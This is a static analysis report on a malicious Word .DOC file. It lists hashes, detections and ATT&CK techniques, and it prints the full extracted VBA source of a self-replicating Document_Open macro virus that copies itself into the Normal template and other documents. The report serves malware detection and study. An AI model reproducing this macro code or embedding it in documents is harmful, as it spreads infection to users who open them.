Malicious Office (OLE) / .DOC — malware analysis report

Static analysis result for SHA-256 5a7b88eb0e6eff6a…

MALICIOUS

Office (OLE) / .DOC

31.0 KB Created: 2024-01-30 08:12:00 Authoring application: WPS Office_12.1.0.16250_F1E327BC-269C-435d-A152-05C5408002CA First seen: 2026-06-24
MD5: 7cf5e941cbd2dc47b71f57586b1b71cc SHA-1: 65298ff466558b75c9f33e6e743516f58ef50cd1 SHA-256: 5a7b88eb0e6eff6a092903c41c3668f4c1ac1811de69f35b3827cc209051d789
148 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The file contains VBA macros, specifically a Document_Open macro, which is designed to replicate its malicious code into the Normal template. This behavior is indicative of an attempt to achieve persistence or infect other documents. The macro attempts to write its code into the Normal template, which is a common technique for malware.

Heuristics 4

  • ClamAV: Doc.Macro.APMPKILL-6097118-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.APMPKILL-6097118-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
              .DeleteLines 1, .CountOfLines
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1025 bytes
SHA-256: b6bb40c3324a9a55276682d3a04936515debedc19798cd9b4db60b6bc4ef53ca
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
'KILL
   On Error Resume Next
    Set prevDocument = NormalTemplate
    Set prevDocument = ActiveDocument
    Set nextDocument = NormalTemplate
   MyCode = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 20)
   Set Host = NormalTemplate.VBProject.VBComponents(1).CodeModule
   If ThisDocument = NormalTemplate Then _
      Set Host = ActiveDocument.VBProject.VBComponents(1).CodeModule
   With Host
       If .Lines(1, 1) = "APMP" & .Lines(1, 2) <> "KILL" Then
          .DeleteLines 1, .CountOfLines
          .InsertLines 1, MyCode
          If ThisDocument = NormalTemplate Then _
             ActiveDocument.SaveAs ActiveDocument.FullName
       End If
   End With
End Sub